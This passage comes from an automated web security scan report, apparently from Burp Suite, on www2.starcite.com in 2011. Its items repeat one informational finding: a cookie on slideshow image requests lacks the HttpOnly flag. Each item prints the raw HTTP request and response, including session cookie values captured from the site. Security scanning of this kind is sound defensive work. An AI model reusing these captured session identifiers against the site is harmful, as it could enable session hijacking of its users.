Keep-Alive: timeout=5, max=78
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:36:17 GMT;path=/
Content-Length: 16966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.91. http://www2.starcite.com/starcite/slideshow/images/bgsmall.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/slideshow/images/bgsmall.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/slideshow/images/bgsmall.png HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:23 GMT
Server: Apache
Last-Modified: Wed, 27 Jan 2010 19:48:43 GMT
ETag: "100000000317c-d6bc-47e2ab0931cc0"
Accept-Ranges: bytes
Content-Length: 54972
Content-Type: image/png
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:49 GMT;path=/

...[SNIP]...

2.92. http://www2.starcite.com/starcite/slideshow/images/big-picture_r1_c1.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/slideshow/images/big-picture_r1_c1.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/slideshow/images/big-picture_r1_c1.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:17 GMT
Server: Apache
Last-Modified: Tue, 09 Feb 2010 22:17:00 GMT
ETag: "100000000317d-5fe1-47f3246d06f00"
Accept-Ranges: bytes
Content-Length: 24545
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:43 GMT;path=/

...[SNIP]...

2.93. http://www2.starcite.com/starcite/slideshow/images/big-picture_r2_c1.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/slideshow/images/big-picture_r2_c1.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/slideshow/images/big-picture_r2_c1.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:25 GMT
Server: Apache
Last-Modified: Tue, 09 Feb 2010 22:17:00 GMT
ETag: "100000000317e-8f13-47f3246d06f00"
Accept-Ranges: bytes
Content-Length: 36627
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:51 GMT;path=/

...[SNIP]...

2.94. http://www2.starcite.com/starcite/slideshow/images/big-picture_r3_c1.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/slideshow/images/big-picture_r3_c1.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/slideshow/images/big-picture_r3_c1.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:17 GMT
Server: Apache
Last-Modified: Tue, 09 Feb 2010 22:17:00 GMT
ETag: "100000000317f-4ad0-47f3246d06f00"
Accept-Ranges: bytes
Content-Length: 19152
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:43 GMT;path=/

...[SNIP]...

2.95. http://www2.starcite.com/starcite/slideshow/images/bpsmall.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/slideshow/images/bpsmall.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/slideshow/images/bpsmall.png HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:23 GMT
Server: Apache
Last-Modified: Wed, 27 Jan 2010 19:38:01 GMT
ETag: "1000000003185-e43e-47e2a8a4ef840"
Accept-Ranges: bytes
Content-Length: 58430
Content-Type: image/png
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:49 GMT;path=/

...[SNIP]...

2.96. http://www2.starcite.com/starcite/slideshow/images/bridging-the-gap_1.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/slideshow/images/bridging-the-gap_1.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/slideshow/images/bridging-the-gap_1.jpg HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:18 GMT
Server: Apache
Last-Modified: Thu, 11 Feb 2010 19:58:03 GMT
ETag: "100000000318c-c8e-47f589192a8c0"
Accept-Ranges: bytes
Content-Length: 3214
Content-Type: image/jpeg
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:44 GMT;path=/

...[SNIP]...

2.97. http://www2.starcite.com/starcite/slideshow/images/bridging-the-gap_2.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/slideshow/images/bridging-the-gap_2.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/slideshow/images/bridging-the-gap_2.jpg HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:18 GMT
Server: Apache
Last-Modified: Thu, 11 Feb 2010 19:58:17 GMT
ETag: "100000000318e-43a8-47f5892684840"
Accept-Ranges: bytes
Content-Length: 17320
Content-Type: image/jpeg
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:44 GMT;path=/

...[SNIP]...

2.98. http://www2.starcite.com/starcite/slideshow/images/bridging-the-gap_3.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/slideshow/images/bridging-the-gap_3.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/slideshow/images/bridging-the-gap_3.jpg HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:20 GMT
Server: Apache
Last-Modified: Thu, 11 Feb 2010 19:58:28 GMT
ETag: "1000000003190-872-47f5893102100"
Accept-Ranges: bytes
Content-Length: 2162
Content-Type: image/jpeg
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:46 GMT;path=/

...[SNIP]...

2.99. http://www2.starcite.com/starcite/slideshow/images/buysol.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/slideshow/images/buysol.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_Pvutjef-NluXfc-IUUQ=e24722583660

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/slideshow/images/buysol.png HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:18 GMT
Server: Apache
Last-Modified: Fri, 29 Jan 2010 18:59:09 GMT
ETag: "1000000003191-19df-47e523afe3940"
Accept-Ranges: bytes
Content-Length: 6623
Content-Type: image/png
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:44 GMT;path=/

...[SNIP]...

2.100. http://www2.starcite.com/starcite/slideshow/images/corpsol.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/slideshow/images/corpsol.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_Pvutjef-NluXfc-IUUQ=e24722583660

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/slideshow/images/corpsol.png HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:18 GMT
Server: Apache
Last-Modified: Fri, 29 Jan 2010 18:58:23 GMT
ETag: "1000000003192-1bc8-47e52384051c0"
Accept-Ranges: bytes
Content-Length: 7112
Content-Type: image/png
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:44 GMT;path=/

...[SNIP]...

2.101. http://www2.starcite.com/starcite/slideshow/images/meetings1.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/slideshow/images/meetings1.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_Pvutjef-NluXfc-IUUQ=e24722583660

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/slideshow/images/meetings1.jpg HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:25 GMT
Server: Apache
Last-Modified: Wed, 28 Apr 2010 14:41:08 GMT
ETag: "20000000023dd-33d0-4854d00214900"
Accept-Ranges: bytes
Content-Length: 13264
Content-Type: image/jpeg
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:51 GMT;path=/

...[SNIP]...

2.102. http://www2.starcite.com/starcite/slideshow/images/meetings2.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/slideshow/images/meetings2.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_Pvutjef-NluXfc-IUUQ=e24722583660

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/slideshow/images/meetings2.jpg HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:25 GMT
Server: Apache
Last-Modified: Wed, 28 Apr 2010 14:41:09 GMT
ETag: "20000000023de-8a5d-4854d00308b40"
Accept-Ranges: bytes
Content-Length: 35421
Content-Type: image/jpeg
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:51 GMT;path=/

...[SNIP]...

2.103. http://www2.starcite.com/starcite/slideshow/images/meetings3a.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/slideshow/images/meetings3a.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_Pvutjef-NluXfc-IUUQ=e24722583660

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/slideshow/images/meetings3a.jpg HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:25 GMT
Server: Apache
Last-Modified: Wed, 28 Apr 2010 14:41:09 GMT
ETag: "20000000023df-772-4854d00308b40"
Accept-Ranges: bytes
Content-Length: 1906
Content-Type: image/jpeg
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:51 GMT;path=/

...[SNIP]...

2.104. http://www2.starcite.com/starcite/slideshow/images/meetings3b.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/slideshow/images/meetings3b.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_Pvutjef-NluXfc-IUUQ=e24722583660

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/slideshow/images/meetings3b.jpg HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:25 GMT
Server: Apache
Last-Modified: Wed, 28 Apr 2010 14:41:09 GMT
ETag: "20000000023e0-759-4854d00308b40"
Accept-Ranges: bytes
Content-Length: 1881
Content-Type: image/jpeg
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:51 GMT;path=/

...[SNIP]...

2.105. http://www2.starcite.com/starcite/slideshow/images/meetings3c.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/slideshow/images/meetings3c.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_Pvutjef-NluXfc-IUUQ=e24722583660

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/slideshow/images/meetings3c.jpg HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:25 GMT
Server: Apache
Last-Modified: Wed, 28 Apr 2010 14:41:09 GMT
ETag: "20000000023e1-1b3a-4854d00308b40"
Accept-Ranges: bytes
Content-Length: 6970
Content-Type: image/jpeg
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:51 GMT;path=/

...[SNIP]...

2.106. http://www2.starcite.com/starcite/slideshow/images/rock-star_1.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/slideshow/images/rock-star_1.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_Pvutjef-NluXfc-IUUQ=e24722583660

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/slideshow/images/rock-star_1.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:18 GMT
Server: Apache
Last-Modified: Tue, 09 Feb 2010 22:15:50 GMT
ETag: "1000000003193-36ed-47f3242a45180"
Accept-Ranges: bytes
Content-Length: 14061
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:44 GMT;path=/

...[SNIP]...

2.107. http://www2.starcite.com/starcite/slideshow/images/rock-star_2.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/slideshow/images/rock-star_2.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_Pvutjef-NluXfc-IUUQ=e24722583660

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/slideshow/images/rock-star_2.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:20 GMT
Server: Apache
Last-Modified: Tue, 09 Feb 2010 22:15:50 GMT
ETag: "1000000003194-b623-47f3242a45180"
Accept-Ranges: bytes
Content-Length: 46627
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:46 GMT;path=/

...[SNIP]...

2.108. http://www2.starcite.com/starcite/slideshow/images/rock-star_3.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/slideshow/images/rock-star_3.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_Pvutjef-NluXfc-IUUQ=e24722583660

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/slideshow/images/rock-star_3.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:20 GMT
Server: Apache
Last-Modified: Tue, 09 Feb 2010 22:15:50 GMT
ETag: "1000000003195-85b5-47f3242a45180"
Accept-Ranges: bytes
Content-Length: 34229
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:46 GMT;path=/

...[SNIP]...

2.109. http://www2.starcite.com/starcite/slideshow/images/rssmall.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/slideshow/images/rssmall.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_Pvutjef-NluXfc-IUUQ=e24722583660

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/slideshow/images/rssmall.png HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:24 GMT
Server: Apache
Last-Modified: Wed, 27 Jan 2010 19:50:45 GMT
ETag: "100000000319b-fbe3-47e2ab7d8af40"
Accept-Ranges: bytes
Content-Length: 64483
Content-Type: image/png
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:49 GMT;path=/

...[SNIP]...

2.110. http://www2.starcite.com/starcite/slideshow/images/slide4small.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/slideshow/images/slide4small.png

Issue detail

